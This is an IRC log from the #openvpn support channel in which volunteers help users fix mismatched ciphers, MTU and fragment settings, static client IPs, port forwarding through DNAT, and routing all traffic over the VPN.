20:10 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 255 seconds]
20:11 -!- sh_t [~sht@176.222.238.158] has joined #openvpn
20:12 -!- pinion [~pinion@unaffiliated/pinion] has quit [Read error: Connection reset by peer]
20:15 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit []
20:16 -!- pinion [~pinion@unaffiliated/pinion] has joined #openvpn
20:21 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 248 seconds]
20:27 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has joined #openvpn
20:28 -!- bluethundr [~dunphy@ool-457cd1ed.dyn.optonline.net] has quit [Read error: Connection reset by peer]
20:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
20:34 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal]
20:35 -!- latenite [~latenite@138.77.120.247] has joined #openvpn
20:35 <+pekster> !configs
20:35 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
20:35 <+pekster> !logs
20:35 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
20:35 <+pekster> Start there
20:36 <+pekster> verb 3 is fine if that's what you're using now (I'll let you know if I need higher after seeing them)
20:38 < latenite> pekster, sorry I already edited and restarted...
20:38 < latenite> so thats the server https://gist.github.com/anonymous/5074229
20:38 <@vpnHelper> Title: gist:5074229 (at gist.github.com)
20:38 <+pekster> np, 5 just gives more info (more isn't a problem, although >5 and you end up with lots of worthless debugging info, unless you're a developer)
20:39 <+pekster> Start with the config
20:39 <+pekster> status doesn't help (that shows you have "no clients" connected and isn't useful)
20:39 <+pekster> See the bot output above for a grep syntax to strip comments too
20:40 < latenite> and thats the client log: https://gist.github.com/anonymous/5074235
20:40 <@vpnHelper> Title: gist:5074235 (at gist.github.com)
20:41 < latenite> pekster, I wonder why it says "inactive" when I restart
20:41 < dli_> can I connect to openvpn 2.2 server using openvpn version 2.3 client?
20:41 <+pekster> dli_: Yup, everything except ipv6 should work fine like that
20:42 < latenite> pekster, this is the server config:
20:42 < latenite> https://gist.github.com/anonymous/5074237
20:42 <+pekster> latenite: looks like you're not getting any options or IP pushed
20:42 <@vpnHelper> Title: gist:5074237 (at gist.github.com)
20:42 < dli_> pekster, then, it's really weird, each time I upgrade to 2.3 client. the client gets IP, but nothing else works, I can not ping
20:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
20:43 <+pekster> best to have run that through the grep command the bot gave you above latenite.
I can do it on my end, but next time I don't need 100's of lines of comments/blanks
20:43 < dli_> Mar 2 21:43:00 compaq ovpn-openvpn[4768]: gateway/172.16.0.6:44037 FRAG_IN error flags=0xfa2a187b: FRAG_TEST not implemented
20:44 < latenite> pekster, please excuse https://gist.github.com/anonymous/5074246
20:44 <@vpnHelper> Title: gist:5074246 (at gist.github.com)
20:45 <+pekster> Thanks, much easier to read (and less of a hassle to save/sed/re-load that on my end)
20:46 <+pekster> latenite: Can you paste the client config the same way? It's not pulling the IP/route details from the server it should
20:46 <+pekster> You're probably missing the client or pull directive to do that
20:46 <+pekster> dli_: You get that in the client log when pinging the server's VPN IP?
20:47 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Ping timeout: 248 seconds]
20:48 < latenite> pekster, there we go. :D https://gist.github.com/anonymous/5074256
20:48 <@vpnHelper> Title: gist:5074256 (at gist.github.com)
20:48 -!- l1t [~l1t@cpe-70-112-112-239.austin.res.rr.com] has joined #openvpn
20:49 < dli_> pekster, http://pastebin.com/UPz6zj99
20:50 < l1t> hi i'm getting the following error when just testing connecting to openvpn from my home network to my home router vpn: https://ezcrypt.it/Nd6n#W1xQqw5FAnChgo4latDoxgnB Where do I actually remove --remote or add --float to??
20:50 <@vpnHelper> Title: EZCrypt - Paste (at ezcrypt.it)
20:50 <+pekster> latenite: Okay, looks like the client isn't successfully getting connected. that log file from the client doesn't contain the expected line 'Initialization sequence completed'. It is getting an initial packet back (line 230 in the client log paste you linked) but not a successful connection
20:51 <+pekster> dli_: Looks like at the very least you have mis-matched MTU settings between your peers
20:52 < latenite> pekster, hmm ok. I have to admit I dont know how to get this straight.
How would I get an Initialization sequence completed then?
20:55 <+pekster> l1t: The config file on the system emitting that message, or the command-line you're calling it with
20:56 < dli_> pekster, I have "tun-mtu 1450" and "fragment 1350" at both server and client conf, but the client log shows, local='tun-mtu 1500',
20:56 <+pekster> latenite: Did you copy that log file prematurely before it completed? If not, the TLS handshake and openvpn tunnel negotiation never completed and you're not actually connected, hence the client has no IP
20:56 < latenite> pekster, I dont think the network setting on the tun device are right https://gist.github.com/anonymous/5074281
20:56 <@vpnHelper> Title: gist:5074281 (at gist.github.com)
20:58 <+pekster> dli_: Any chance that's getting overwritten with some frontend (like networkmanager or an initscript) adding --tun-mtu as a command line option? The last used option takes priority
20:58 <+pekster> latenite: that's fine for a PtP setup. 'ip route show' should list the 10.8.0.0/24 route
20:59 < dli_> pekster, nobody 9867 0.0 0.0 21044 3228 ? Ss 21:53 0:00 /usr/sbin/openvpn --cd /etc/openvpn --config /etc/openvpn/tw3.conf --daemon openvpn@tw3
20:59 < latenite> I really might have pasted the log file too early. Now there are another 3 lines https://gist.github.com/gists
20:59 <@vpnHelper> Title: Gists (at gist.github.com)
20:59 < dli_> pekster, looks like there's no command line option for openvpn at client side.
Another hint is that, if I downgrade 2.3 client to 2.2, without conf change, it works again
21:00 < latenite> pekster, that's the routing table of the client https://gist.github.com/anonymous/5074292
21:00 <@vpnHelper> Title: gist:5074292 (at gist.github.com)
21:00 <+pekster> dli_: "no command line option for openvpn at client side" <-- I don't get that
21:01 < dli_> pekster, I pasted the whole command line for openvpn at the client side
21:01 < dli_> pekster, let me pastebin the client conf file
21:01 <+pekster> Sure
21:02 <+pekster> latenite: The routing table looks fine. You didn't copy the URL on the extra client log output link though
21:03 < dli_> pekster, https://gist.github.com/5074300
21:03 <@vpnHelper> Title: /tmp/tw3.conf (at gist.github.com)
21:03 < latenite> pekster, sorry. I don't know what you mean. What am I missing?
21:04 < latenite> pekster, ohh I see...
21:04 < latenite> hold on.. :D
21:04 < latenite> pekster, https://gist.github.com/anonymous/5074289
21:04 <@vpnHelper> Title: gist:5074289 (at gist.github.com)
21:05 < latenite> pekster, sometimes github is kinda slow.. :D
21:07 <+pekster> dli_: Ah, okay, I don't think you intend to be using an --fragment value lower than the --tun-mtu value. That's probably why you get that FRAG_TEST message, because openvpn is trying to fragment packets smaller than your link size is. Do you need the mtu stuff at all? Normally you only need that when either PMTU is broken, or you have a pppoe link or something
21:07 < latenite> pekster, whats with line 447 to 461 ? https://gist.github.com/anonymous/5074289
21:07 <@vpnHelper> Title: gist:5074289 (at gist.github.com)
21:08 < latenite> pekster, that looks kind of bad to me.. Is it?
21:08 <+pekster> This is a bigger issue for you: WARNING: 'cipher' is used inconsistently, local='cipher AES-128-CBC', remote='cipher BF-CBC'
21:09 <+pekster> You need to match options like encryption on both sides
21:09 < dli_> pekster, I found I had to set those values, without fragment, copying files larger than 1KB failed. how do I fix this issue?
21:09 <+pekster> I missed that before latenite. Your client & server configs don't match
21:09 < latenite> pekster, in what way?
21:10 < latenite> pekster, where would the mismatch be?
21:10 < dli_> pekster, my server is at home on PPPOE (adsl)
21:10 <+pekster> latenite: remove line 14 as shown here: https://gist.github.com/anonymous/5074256
21:10 <@vpnHelper> Title: gist:5074256 (at gist.github.com)
21:11 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn
21:11 -!- aaaar0n is now known as ar0nic
21:11 <+pekster> dli_: Ah, ideally use the --mtu-test option on the client (that'll take a few minutes to complete) which connects to your server and discovers the largest unfragmented packet it can send successfully
21:11 < dli_> pekster, thanks
21:12 <+pekster> dli_: Then take that value and apply it to the --fragment value, along with the --mssfix option
21:12 <+pekster> You should leave the --tun-mtu alone in most cases
21:12 < latenite> pekster, wow, cool. I can ping the server.
21:12 < latenite> https://gist.github.com/anonymous/5074316
21:12 <@vpnHelper> Title: gist:5074316 (at gist.github.com)
21:12 < dli_> pekster, it's clear, thanks
21:12 <+pekster> --mssfix in the manpage has some useful troubleshooting tips too dli_ :)
21:13 < latenite> pekster, thats good, right :D ?!!
21:13 <+pekster> Yup, your VPN is working since you can ping your remote peer
21:13 <+pekster> (log file was again cut off early, but that's okay.)
21:14 < latenite> pekster, now how would I test that whole thing? I mean the main reason why I did set it up was because my email client's ports are filtered.
21:14 <+pekster> You can drop the verb level down to 4 or lower (3 is the default) since otherwise your log gets RWrw printed for every packet
21:14 <+pekster> latenite: What's the goal here?
21:15 <+pekster> !goal
21:15 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
21:15 < latenite> pekster, I just wonder about the workings. Because now I have the wifi....AND the tun interface. How does my laptop's software (email client) know which device/internet connection to use?
21:16 <+pekster> routing tables. Your default route is still used; the VPN currently only is used for 10.8.0.0/24 (the VPN network itself)
21:16 < latenite> the goal is to be able to use all ports on my client while being on this campus wifi which only allows certain ports (80, 443, 21 ...)
21:16 <+pekster> "use all ports on my client" ?
21:17 <+pekster> For outbound access?
21:17 < latenite> e.g. I can ssh TO the outside world. But I can not copy a file from a remote server to my laptop.
21:18 < latenite> ssh inbound is blocked by the wifi-campus setup
21:18 <+pekster> That's more complicated since your client's VPN IP is an rfc1918 IP, so it's private and not globally routable
21:18 <+pekster> You either need to give the client a public IP (which requires you to have routed a block on your VPN server that you can allocate to clients) or use NAT on the VPN server to expose the ports you want
21:19 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has quit [Ping timeout: 248 seconds]
21:20 < latenite> pekster, I can not give my client a public IP. I only have this one public IP that is bound to my Vserver that I have rented.
21:21 < latenite> pekster, each public IP would cost a dollar or so and I doubt they hand out as many as I want
21:21 < latenite> pekster, How would I do the NAT thing on the server?
21:23 -!- pulz_ [geir@winning.no] has joined #openvpn
21:23 -!- matsh_ [divine@nanogene.org] has joined #openvpn
21:24 -!- rob0_ [rob0@harrier.slackbuilds.org] has joined #openvpn
21:24 -!- rob0_ [rob0@harrier.slackbuilds.org] has quit [Changing host]
21:24 -!- rob0_ [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn
21:25 -!- kisom_ [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn
21:26 <+pekster> latenite: So you can DNAT packets as they reach your server's public IP and send them to your VPN client's internal IP, although you need to be careful not to do this for ssh for instance or you'll lose remote access to the host itself
21:26 <+pekster> (or run ssh on different ports for the VPN server vs the client)
21:27 <+pekster> Make sure to exclude ports like that you require proper access to the host, and then you could redirect anything else to the client. You'd want to firewall the client properly in any event, since it will be exposed to all the usual nastiness on the public Internet
21:27 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn
21:27 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has joined #openvpn
21:27 -!- dli_ [~dli@69.172.86.211] has joined #openvpn
21:28 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Disconnected by services]
21:28 -!- rob0_ is now known as rob0
21:29 < latenite> pekster, So what you're saying is: I should run my sshd on the vpn-server on a port like 2222 ?
21:29 < latenite> pekster, did I get that right?
21:29 <+pekster> Not really, that depends greatly on how you want to DNAT things
21:29 <+pekster> If you want to pass specific ports through, then do that instead
21:30 <+pekster> Otherwise, here's an example that re-directs "everything but tcp/22" to the VPN client, assuming it's on 10.8.0.6: http://paste.kde.org/686006/
21:30 -!- Netsplit *.net <-> *.split quits: @plaisthos, @vpnHelper, corretico, simcop2387, pulz, Cybertinus, matsh, amir, kisom, clu5ter
21:30 -!- matsh_ is now known as matsh
21:30 -!- simcop2387_ is now known as simcop2387
21:30 <+pekster> It's very (very!) critical you understand how that works before you implement it, and requires the traffic to be let through on the relevant filter chains as well
21:31 <+pekster> And, there goes our bot
21:31 < latenite> pekster, I am very sorry. But this is all very new to me.
21:32 < latenite> so what your paste does, is set up iptables/firewall rules. right?
21:32 <+pekster> latenite: So, basically that snippet (that's all on the nat table) takes any packets coming in bound for the public IP of the server, and sends them to the "vpn_nat" chain. It returns (ie: ignores) anything coming in for tcp/22 (which I'm assuming is for ssh to the host itself.) Anything else that's coming in as a new connection gets re-written to go to the VPN client instead
21:33 < latenite> pekster, I'd have to read the manual about the flags -j -d
21:33 <+pekster> Line 10 takes incoming packets bound for the VPN server's public IP and sends them to the vpn_nat chain
21:33 <+pekster> Line 11 ignores (ie: does not NAT) ones bound for tcp/22
21:34 <+pekster> Line 12 takes "anything else" on that vpn_nat chain and sends them to the VPN client on that IP
21:35 < latenite> pekster, but by that only the client with 10.8.0.6 would be able to use all that?
21:35 <+pekster> Right
21:35 <+pekster> You only have 1 public IP
21:35 <+pekster> Welcome to the ugly world of NAT
21:35 <+pekster> Your 10.8.0.0/24 "doesn't exist" according to the rest of the internet. You and everyone else using the example VPN config file use that same network
21:36 < latenite> No way I could ever use more than one client to do what I want with this vpn-server?
21:36 -!- Netsplit over, joins: corretico
21:36 < latenite> I do see the problem!
21:36 <+pekster> Sure, you can connect as many as you'd like
21:36 <+pekster> But how do you plan to get "outside" data to them?
21:37 < latenite> how would my vpn server know where to send the packets to...if they are meant to be sent to the same IP/port
21:37 -!- Netsplit over, joins: amir
21:37 <+pekster> Right. It can't.
21:37 < latenite> I did get that right?!
21:37 < latenite> ok..I feel like I understood some of it.
21:38 < latenite> Ok so what I would need is a range of real IPs?!
21:38 < latenite> no way around that?!
21:38 <+pekster> That, or use more targeted NAT and send specific ports to specific clients. You presumably also want to expand the --server directive on the openvpn server config file and break that out (see the manpage for how expansion works) to reduce the ifconfig-pool
21:38 <+pekster> You need static IPs if you expect the same client to get the same IP, so that would mean using ccd files and ifconfig-push rules in them
21:38 <+pekster> !ccd
21:39 <+pekster> Ugh, and the bot was lost in the netsplit
21:39 <+pekster> The bot would have told you:
21:39 <+pekster> #1: entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name
21:39 <+pekster> #2: the ccd file is parsed each time the client connects.
21:40 < latenite> pekster, that's basically for my client to always get the same IP?!
21:40 * rob0 appoints pekster as #openvpn's Junior Assistant Bot
21:40 <+pekster> rob0: If I didn't have the factoids link in my browser URL history, I was not planning to grep for the factoids link :P
21:41 < rob0> Bot Pro Tem
21:41 <+pekster> latenite: Right. And ifconfig-push gets more logical to manage if you use the 'topology subnet' in your server, otherwise you need to push IPs in the middle of a /30 within the VPN network
21:42 <+pekster> (and that's just ugly)
21:43 < latenite> pekster, *cry* I did not get that a bit. sorry
21:43 < latenite> So for me to get started.
21:43 <+pekster> Add 'topology subnet' to the server is all you need to take away from that
21:43 < latenite> ...I dont have any rules in my firewall for now...
21:43 <+pekster> You don't need (or want) the default net30 behaviour (it's complicated, and only useful if you have really old 2.0.9 clients that are over 6 years old)
21:45 < latenite> pekster, I wouldn't know what the net30 thing is. sorry
21:45 < latenite> ok I added topology subnet to my server.conf
21:45 <+pekster> In that case you can take my example rule snippet and load it via iptables-restore (though you need to fix my typo: I added an extra space on line 5 after the colon that doesn't belong)
21:46 <+pekster> It's somewhat unwise to run a server with no firewall at all, but perhaps you're not running anything besides ssh on it anyway. It's still bad practice for anything on the public Internet
21:47 <+pekster> Just be warned that ruleset does exactly what I described in that anything not caught by the return rules on that vpn_nat chain gets sent to the client.
It will effectively make communicating with the server impossible for anything not there
21:47 <+pekster> That includes inbound pings too, for better or worse
21:48 <+pekster> Overall I think it's a somewhat silly thing to do, but you're free to play with that
21:48 <+pekster> Seems an awful lot of trouble to go through just to accept inbound connections to your system
21:50 < latenite> pekster, I could still use ssh to log in to the vpn server? right?
21:50 <+pekster> Provided it's listening on port 22, yes
21:51 < latenite> pekster, actually I would like that. by that it's like a "dead thing" but nicely pushes everything to my client
21:51 <+pekster> rob0: Can you please make IPv6 come faster? kthx.
21:52 < rob0> um, I'm an email admin, I am afraid of ipv6 :(
21:52 < latenite> pekster, do I need to do anything else to the server config to make sure I keep getting the same ip for my client? For now I only added topology subnet and restarted
21:52 <+pekster> latenite: Right. I'd generally recommend you accept pings to the server too, since that's a useful debugging tool. Add this between lines 11 & 12: -A vpn_nat -p icmp --icmp-type ping
21:52 < rob0> (wide open opportunities for spammers, DNSBLs will no longer be feasible)
21:53 <+pekster> latenite: Yes, do what I said above. Expand the --server directive as described in the manpage for the expansion for tun. Then reduce your ifconfig-pool range to something sane like 10.8.0.100 10.8.0.199.
Finally add a ccd file as I pasted info for above, named with your client cert CN, and put in that file: ifconfig-push 10.8.0.6 255.255.255.0
21:54 <+pekster> rob0: Well, if mail servers checked to make sure a sending MTA was also listed in a forward zone, that might help
21:55 <+pekster> Google and other places have IPv6-enabled mail gateways, and they seem to be doing okay
21:55 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn
21:55 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
21:55 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn
21:55 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
21:55 -!- ServerMode/#openvpn [+oo plaisthos vpnHelper] by leguin.freenode.net
21:55 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Max SendQ exceeded]
21:55 <+pekster> vpnHelper: slacker.
21:55 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn
21:56 < rob0> The only reasonable way I see is to use a default-deny policy and whitelists. Spam hasn't yet taken hold in ipv6 because spammers focus their efforts where more junk can get delivered. A lot of sites are hesitating to publish ipv6 MX.
21:56 < rob0> when more users are in v6, spam will be there too
21:58 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has quit [Ping timeout: 245 seconds]
22:00 < latenite> pekster, nice. I will try to do all that now. For starters I will feed myself the man page ... :D top to bottom
22:01 < latenite> pekster, one thing: How can I change the default route on my client? For now it's still using the wifi
22:01 <+pekster> You want to redirect all Internet-bound traffic to use the VPN
22:01 <+pekster> !redirect
22:01 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server.
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
22:01 <@vpnHelper> http://ircpimps.org/redirect.png
22:02 <+pekster> (actually, you need to do that anyway for the DNAT-everything ruleset I showed above too, otherwise return routing gets all messed up)
22:04 <+pekster> rob0: Yea, I wonder if google has a write-up somewhere on what they do, or if they just filter everything and call that good enough for v6 for now
22:04 <+pekster> filter := spam filtering
22:06 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Read error: Operation timed out]
22:06 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn
22:07 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out]
22:07 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
22:07 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has joined #openvpn
22:07 -!- pinion [~pinion@unaffiliated/pinion] has quit [Read error: Operation timed out]
22:08 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out]
22:08 -!- pinion [~pinion@unaffiliated/pinion] has joined #openvpn
22:08 < latenite> pekster, what does "(see !def1)" mean? How can I see info on that?
22:08 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
22:09 < rob0> !def1
22:09 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway.
or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
22:10 < latenite> !ipforward
22:10 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
22:10 < latenite> ahh :D cool th
22:10 < latenite> x
22:10 < rob0> pekster: Content filtering is about the only thing they can do right now, other than maintaining private ipv6 blacklists.
22:10 < latenite> !nat
22:10 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto
22:11 < rob0> but whereas ipv4 spam is ~90% of the SMTP traffic now, ipv6 spam is probably not nearly so high yet.
22:13 -!- Teck7 [~teck7@bas1-montreal54-1167955052.dsl.bell.ca] has joined #openvpn
22:16 < latenite> pekster, let me thank you. You really got me a good start on things here. I will try to figure out the rest after lunch.
22:16 -!- rfxn [~teck7@bas1-montreal54-1168086246.dsl.bell.ca] has quit [Ping timeout: 248 seconds]
22:17 < latenite> I really appreciate your help. I would have never found all that out
22:19 < latenite> pekster, can you tell me how to set the gateway in the route right?
Right now it's 0.0.0.0 and not the primary route: https://gist.github.com/anonymous/5074482
22:19 <@vpnHelper> Title: gist:5074482 (at gist.github.com)
22:21 <+pekster> latenite: Looks like you need to add the 'route-gateway' directive (or push it from the server if that's from the client's view)
22:21 <+pekster> That should match the VPN server's VPN IP. As before, see the --server expansion in the manpage
22:21 <+pekster> (it's included there)
22:22 < latenite> pekster, it is from the client's view. This is the server: https://gist.github.com/anonymous/5074493
22:22 <@vpnHelper> Title: gist:5074493 (at gist.github.com)
22:22 <+pekster> Oh, right, because it's on-link
22:23 <+pekster> 'ip route' is the preferred way to show routes
22:23 <+pekster> ifconfig, route, and netstat are all old tools for that purpose
22:26 < latenite> pekster, ok I will.
22:27 < latenite> pekster, the --server expansion only has two parameters: network and netmask
22:27 < latenite> https://gist.github.com/anonymous/5074497
22:28 <+pekster> The entire "for example" section is the expansion
22:28 <+pekster> "... *expands* as follows:" (emphasis mine)
22:28 <+pekster> ifconfig, ifconfig-pool, push "route-gateway ..." are all part of the implicit expansion. You need to fix your pool range if you want statically assigned IPs
22:29 <+pekster> ie: don't let --server do it for you. It's a helper-directive that only works if you want exactly what it "helps" do for you
22:29 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection]
22:29 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
22:29 -!- mode/#openvpn [+o vpnHelper] by ChanServ
22:32 < latenite> pekster, setting the pool range is part of the ccp file?
22:38 <+pekster> ccd is for client-specific options, so no. ifconfig-pool goes in the main server config
22:38 <+pekster> ifconfig-push gets put in a ccd file (or client-connect script.)
22:38 <+pekster> !ccd
22:38 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects.
23:55 <+pekster> !interface
23:55 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when being connected. Be sure to also add the routing tables for both situations from client and from server or (#2) in windows: ipconfig /all - unix: ifconfig -a , and for routing tables: netstat -rn
23:56 <+pekster> !forget interface 2
23:56 <@vpnHelper> Joo got it.
23:56 <+pekster> !learn interface as For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6)
23:56 <@vpnHelper> Joo got it.
23:56 <+pekster> !learn interface as For Unix: iface: 'ifconfig -a' routing: 'netstat -rn'
23:56 <@vpnHelper> Joo got it.
23:56 <+pekster> !learn interface as For Linux: iface: 'ip a s' routing: 'ip r' (use ip -6 for IPv6 routes)
23:56 <@vpnHelper> Joo got it.
23:57 <+pekster> !interface
23:57 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when being connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux:
23:57 <@vpnHelper> iface: 'ip a s' routing: 'ip r' (use ip -6 for IPv6 routes)
23:58 <+pekster> !forget interface 4
23:58 <@vpnHelper> Joo got it.
23:58 <+pekster> !learn interface as For Linux: iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes)
23:58 <@vpnHelper> Joo got it.
23:59 <+pekster> That should clean up v4/v6 and OS-centric weirdness in those outputs
--- Day changed Sun Mar 03 2013
02:58 < alcuadrado> !welcome
02:58 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
02:58 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
02:58 < alcuadrado> !goal
02:58 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
03:50 <+EugeneKay> !redirect
03:50 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
03:50 <@vpnHelper> http://ircpimps.org/redirect.png
03:56 < oyugik> Hi guys is there a way I can connect to home network via openvpn
03:58 <+EugeneKay> oyugik - yup. This is a use case covered in the howto.
04:01 < oyugik> do I get that from the website
04:02 < oyugik> my scenario is we have a corporate office network
04:03 < oyugik> I want to be able to use a back up application to ensure that I am able to login globally and get my files no matter where I am
04:03 <+EugeneKay> !howto
04:03 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
04:14 < oyugik> thanks guys
04:23 <@novaflash> just FYI for all you guys; cloudflare DNS has suffered a major fail, many sites on the internet are unreachable at the moment, and it's being fixed by cloudflare. openvpn.net and privatetunnel.com are affected by this as well. so far it looks like in most parts of the world it's working again. some areas may need to get their dns servers updated again before it'll all work.
07:37 < knobo`> Can I make openvpn update /etc/hosts?
07:47 <+EugeneKay> Sure.
07:47 <+EugeneKay> !script
07:47 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn
07:47 < Eryn_1983_FL> hey peeps
07:47 <+EugeneKay> It would be better to have it do a DDNS update tho - editing /etc/hosts is fragile; DNS was invented to make those problems go away
07:47 < Eryn_1983_FL> can you guys help me out with dd-wrt openvpn and hidemyass.com ?
07:48 < knobo`> good idea
07:48 <+EugeneKay> !provider
07:48 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
07:48 <+EugeneKay> Our ability to help is limited if you don't control the server
07:48 < Eryn_1983_FL> i went through both their how tos and i am stumped
07:48 < knobo`> ipp.txt shows a different IP than the client actually got..
07:48 < knobo`> ifconfig-pool-persist ipp.txt
07:49 <+EugeneKay> !ipp
07:49 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static
07:49 < knobo`> thanx
07:54 < knobo`> !iporder
07:54 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
08:51 < pequalsnp> hi, I have a freebsd gateway with dhcpd set up, now I want to run the openvpn client on this gateway and route all dhcp client traffic over openvpn? How do I proceed?
09:41 <+EugeneKay> openvpn prefers to hand out its own addresses
09:41 <+EugeneKay> You can do a bridged setup and dhcp, but such things tend to have bad performance
09:45 < pequalsnp> EugeneKay: I would like to route over tun. Is this a bad idea?
09:45 <+EugeneKay> pequalsnp - routing is the only thing you can do over tun
09:45 <+EugeneKay> When doing routing (the recommended openvpn method) you have to use openvpn's internal addressing
09:46 <+EugeneKay> If your desire for DHCPd is for rDNS records or such, use an --up script
09:47 < pequalsnp> EugeneKay: what do you mean by internal addressing?
09:47 <+EugeneKay> The way openvpn hands out addresses
